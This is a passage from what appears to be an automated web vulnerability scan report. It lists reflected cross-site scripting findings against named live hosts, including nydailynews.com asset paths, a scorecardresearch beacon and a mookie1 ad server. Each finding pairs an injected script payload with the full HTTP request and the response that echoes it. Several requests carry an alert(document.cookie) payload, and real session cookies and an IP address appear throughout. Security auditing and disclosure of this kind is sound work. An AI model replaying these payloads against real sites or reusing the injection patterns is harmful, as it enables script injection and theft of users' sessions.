The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9c8c'%3balert(1)//d85129c0960 was submitted in the REST URL parameter 2. This input was echoed as b9c8c';alert(1)//d85129c0960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/nydn-pack-20101001.jsb9c8c'%3balert(1)//d85129c0960 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:36 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ry.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/nydn-pack-20101001.jsb9c8c';alert(1)//d85129c0960';
}

//-->
...[SNIP]...

4.176. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/thickbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d74d'%3balert(1)//f26d587210b was submitted in the REST URL parameter 1. This input was echoed as 8d74d';alert(1)//f26d587210b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js8d74d'%3balert(1)//f26d587210b/thickbox.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:48 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js8d74d';alert(1)//f26d587210b/thickbox.js';
}

//-->
...[SNIP]...

4.177. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/thickbox.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2772'%3balert(1)//244e853bb28 was submitted in the REST URL parameter 2. This input was echoed as d2772';alert(1)//244e853bb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/thickbox.jsd2772'%3balert(1)//244e853bb28 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:22 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/thickbox.jsd2772';alert(1)//244e853bb28';
}

//-->
...[SNIP]...

4.178. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/webtrends.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c68c0'%3balert(1)//d1c46ff0b51 was submitted in the REST URL parameter 1. This input was echoed as c68c0';alert(1)//d1c46ff0b51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsc68c0'%3balert(1)//d1c46ff0b51/webtrends.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:48 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/jsc68c0';alert(1)//d1c46ff0b51/webtrends.js';
}

//-->
...[SNIP]...

4.179. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/js/webtrends.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df507'%3balert(1)//1ee8507ef3e was submitted in the REST URL parameter 2. This input was echoed as df507';alert(1)//1ee8507ef3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/webtrends.jsdf507'%3balert(1)//1ee8507ef3e HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:22 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/webtrends.jsdf507';alert(1)//1ee8507ef3e';
}

//-->
...[SNIP]...

4.180. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3db19<script>alert(1)</script>af553f35587 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83db19<script>alert(1)</script>af553f35587&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"83db19<script>alert(1)</script>af553f35587", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.181. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 6af11<script>alert(1)</script>c9e14de8521 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=31822366af11<script>alert(1)</script>c9e14de8521&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"31822366af11<script>alert(1)</script>c9e14de8521", c15:"", c16:"", r:""});

4.182. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f583<script>alert(1)</script>358848f85ca was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15=6f583<script>alert(1)</script>358848f85ca HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:30 GMT
Date: Fri, 28 Jan 2011 16:37:30 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"6f583<script>alert(1)</script>358848f85ca", c16:"", r:""});

4.183. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8fbbd<script>alert(1)</script>a4264343a60 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=61354048fbbd<script>alert(1)</script>a4264343a60&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"61354048fbbd<script>alert(1)</script>a4264343a60", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.184. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f9bd2<script>alert(1)</script>c18ecd985dc was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15f9bd2<script>alert(1)</script>c18ecd985dc&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15f9bd2<script>alert(1)</script>c18ecd985dc", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.185. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4d59<script>alert(1)</script>5d1bee0e299 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477c4d59<script>alert(1)</script>5d1bee0e299&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477c4d59<script>alert(1)</script>5d1bee0e299", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.186. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5e148<script>alert(1)</script>915272d1a71 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=5e148<script>alert(1)</script>915272d1a71&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"5e148<script>alert(1)</script>915272d1a71", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.187. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e262a<script>alert(1)</script>dc6ca0c95b2 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=e262a<script>alert(1)</script>dc6ca0c95b2&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"e262a<script>alert(1)</script>dc6ca0c95b2", c10:"3182236", c15:"", c16:"", r:""});

4.188. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c016f"><script>alert(1)</script>86f916feeee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc016f"><script>alert(1)</script>86f916feeee/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:39:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc016f"><script>alert(1)</script>86f916feeee/DLX/748763882/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.189. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b35e"><script>alert(1)</script>2e539209f83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8b35e"><script>alert(1)</script>2e539209f83/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:40:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8b35e"><script>alert(1)</script>2e539209f83/657834999/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.190. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdced"><script>alert(1)</script>cd9f8b1c148 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71fdced"><script>alert(1)</script>cd9f8b1c148 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
